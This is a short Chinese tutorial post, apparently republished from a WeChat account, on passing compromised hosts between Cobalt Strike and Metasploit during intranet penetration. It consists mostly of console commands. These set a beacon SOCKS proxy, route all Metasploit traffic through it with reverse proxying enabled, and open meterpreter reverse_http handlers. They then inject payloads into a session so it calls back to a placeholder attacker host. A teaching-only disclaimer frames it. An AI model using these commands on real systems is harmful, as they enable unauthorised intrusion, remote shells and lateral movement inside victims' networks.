一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚
beacon > socks 1789
setg Proxies socks4:x.x.x.x:1789
//msf所有流量将走此代理
msf6 > setg Proxies socks4:x.x.x.x:1789
//设置允许反向代理,也就是建立双向通道,通过socks反弹shell
msf6 > setg ReverseAllowProxy true
2.CS上线主机给MSF
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_http\不要用64位
msf6 > set lhost 172.17.0.2
msf6 > set lport 8080
msf6 > run
beacon > Spawn msf
meterpreter > background
msf6 > use exploit/windows/local/payload_inject
msf6 > set DisablePayloadHandler true
msf6 > set payload windows/meterpreter/reverse_http
msf6 > set lhost x.x.x.x
msf6 > set lport 8899
msf6 > set session 2
msf6 > run
附视频操作
本文始发于微信公众号(XG小刚):内网渗透-CS与MSF联动
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论